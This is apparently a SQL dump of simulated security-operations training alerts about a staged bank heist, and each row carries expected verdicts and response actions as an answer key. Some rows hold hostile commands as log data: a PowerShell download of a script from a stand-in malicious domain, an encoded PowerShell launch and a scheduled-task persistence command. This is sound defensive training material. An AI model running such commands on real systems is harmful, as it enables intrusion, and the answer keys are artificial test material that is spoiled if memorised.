(811, 'ATM Software Manipulation Attempt', 'high', 'ATM Software Logs', 'An attempt was detected to manipulate ATM software, potentially allowing unauthorized cash withdrawals.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_id\":\"ATM-EXEC-005\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.100\",\"username\":\"atm_user\",\"process_name\":\"atm_dispense.exe\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"action\":\"Execution\",\"status\":\"Attempted execution of unauthorized software detected\",\"remarks\":\"Detected suspicious execution attempt exploiting ATM software vulnerability.\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known ATM software exploitation campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal ATM machine IP.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"atm_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"clean\",\"details\":\"Registered ATM service account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"atm_dispense.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable used in unauthorized ATM cash withdrawal attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with ATM 
manipulation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM software vulnerability.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.459Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_id\\\":\\\"ATM-EXEC-005\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"atm_user\\\",\\\"process_name\\\":\\\"atm_dispense.exe\\\",\\\"file_hash\\\":\\\"9e107d9d372bb6826bd81d3542a419d6\\\",\\\"action\\\":\\\"Execution\\\",\\\"status\\\":\\\"Attempted execution of unauthorized software detected\\\",\\\"remarks\\\":\\\"Detected suspicious execution attempt exploiting ATM 
software vulnerability.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(812, 'Card Processing Network Breach', 'high', 'Card Processing Logs', 'Sensitive data from card processing networks is extracted to facilitate fraudulent transactions. A suspicious outbound connection was detected transferring sensitive card data.', 'Exfiltration', 'T1041 - Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:10Z\",\"event_id\":\"123456\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"filename\":\"export_data_2023.zip\",\"file_hash\":\"a9b1c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"event_description\":\"Data transfer detected to external IP suspected for exfiltration.\",\"protocol\":\"HTTPS\",\"bytes_sent\":10485760,\"application\":\"card_process_app_v1.2\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with card data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of card processing server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"export_data_2023.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal System\",\"verdict\":\"suspicious\",\"details\":\"Filename indicates potential data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a9b1c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known exfiltration 
malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(813, 'Money Mule Coordination', 'medium', 'Communications Monitoring', 'Detected coordination with a network of mules to physically collect dispensed cash. Communication with known malicious IPs observed.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:35Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"username\":\"jdoe\",\"email\":\"mule_coordinator@example.com\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"money_mule_schedule.xlsx\",\"malicious_command\":\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\",\"communication_type\":\"email\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known threat actor IP associated with financial crimes.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"mule_coordinator@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual email activity related to financial transactions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used in financial scams.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 
(Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.462Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:35Z\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"username\\\":\\\"jdoe\\\",\\\"email\\\":\\\"mule_coordinator@example.com\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"money_mule_schedule.xlsx\\\",\\\"malicious_command\\\":\\\"Invoke-WebRequest -Uri https://malicious-domain.com/mule_tasks -OutFile mule_tasks.ps1\\\",\\\"communication_type\\\":\\\"email\\\"}\"}],\"query\":\"index=main 
source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(814, 'Anomalous Network Traffic Spikes', 'high', 'Network Traffic Monitoring', 'Network traffic monitoring has detected significant spikes in outbound traffic correlating with known exfiltration patterns. The traffic appears to be directed towards an external IP address associated with previous malicious activity. The group is potentially attempting to cover their tracks while exfiltrating remaining valuable information.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"bytes_sent\":10485760,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"md5_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"filename\":\"final_report.pdf\",\"action\":\"outbound_traffic\",\"message\":\"Detected anomalous outbound traffic spikes destined for external IPs during data exfiltration phase.\"}', '2026-01-12 22:20:16', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the host initiating the traffic.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous exfiltration activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with known malicious payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_system\",\"verdict\":\"internal\",\"details\":\"Username of the account used to initiate 
the transaction.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"final_report.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_system\",\"verdict\":\"suspicious\",\"details\":\"Filename observed in outbound exfiltration traffic.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(815, 'Initial Compromise via Spear Phishing', 'high', 'Email gateway logs', 'Lazarus Group initiated an attack by targeting key personnel with spear-phishing emails, aiming to gain access to the bank\'s internal network. The email contained a malicious attachment disguised as a routine document.', 'Social Engineering', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T08:45:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"email_subject\":\"Quarterly Financial Report Attached\",\"email_from\":\"john.doe@trustedsource.com\",\"email_to\":\"ceo@bank.com\",\"attachment_name\":\"Q3_Report_2023.docx\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"malicious_url\":\"http://malicious-link.com/download\",\"user_agent\":\"Outlook/16.0.13328.20408\"}', '2026-01-12 22:20:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Records\",\"verdict\":\"internal\",\"details\":\"IP belongs to internal bank network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Exchange\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing campaigns by Lazarus 
Group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Compromise via Spear Phishing\",\"date\":\"2026-02-01T20:32:22.465Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(816, 'Deployment of Custom Malware', 'critical', 'Endpoint detection systems', 'Custom malware associated with the Lazarus Group was detected attempting to manipulate SWIFT software on a financial system endpoint. This malware is designed to facilitate fraudulent transactions by altering legitimate financial data.', 'Malware', 'T1071.001 - Application Layer Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:32:11Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.20\",\"file_name\":\"swift_update.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"username\":\"finance_user\",\"action\":\"malware_deployed\",\"description\":\"Custom malware swift_update.exe with hash b1946ac92492d2347c6235b4d2611184 deployed on 192.168.1.20 by user finance_user from IP 203.0.113.45\"}', '2026-01-12 22:20:52', '2026-02-16 17:58:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous Lazarus Group activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Endpoint within financial department network\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with custom malware used to manipulate financial transactions\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"swift_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection Systems\",\"verdict\":\"malicious\",\"details\":\"Executable designed to interfere with SWIFT 
operations\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"finance_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(817, 'Establishing Persistence in the Network', 'high', 'Network traffic analysis', 'The Lazarus Group has been identified using persistence techniques to maintain access in the network, ensuring their ability to monitor and execute transactions over an extended period. Anomalous network traffic was detected indicating the deployment of a scheduled task to run a known backdoor malware associated with Lazarus activities.', 'Persistence Mechanisms', 'T1053', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"23.89.34.12\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0\",\"filename\":\"scheduled_task.exe\",\"file_hash\":\"e9b1c3f4a5b6e7d8f9c0a1b2c3d4e5f6\",\"command_line\":\"schtasks /create /tn \\\"UpdateTask\\\" /tr \\\"C:\\\\Windows\\\\system32\\\\scheduled_task.exe\\\" /sc daily /st 02:00\",\"username\":\"admin_user\",\"tags\":[\"Lazarus Group\",\"Persistence\",\"Scheduled Task\"]}', '2026-01-12 22:20:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"23.89.34.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Lazarus Group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e9b1c3f4a5b6e7d8f9c0a1b2c3d4e5f6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known Lazarus backdoor malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"scheduled_task.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Filename frequently used in 
Lazarus persistence mechanisms.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"internal\",\"details\":\"User account used to schedule the malicious task.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(818, 'Lateral Movement to SWIFT Servers', 'critical', 'Internal network logs', 'The attacker has successfully moved laterally through the network and is targeting the SWIFT servers. This is a critical milestone in their heist operation aiming to access and manipulate the SWIFT messaging system.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-03T14:22:17Z\",\"source_ip\":\"192.168.1.104\",\"destination_ip\":\"192.168.1.200\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"swift_admin\",\"filename\":\"malware_payload.bin\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"access_granted\",\"message\":\"Successful authentication to SWIFT server using compromised credentials.\",\"event_id\":\"4672\",\"log_type\":\"authentication_success\",\"process\":\"svchost.exe\"}', '2026-01-12 22:20:52', '2026-02-16 17:58:46', 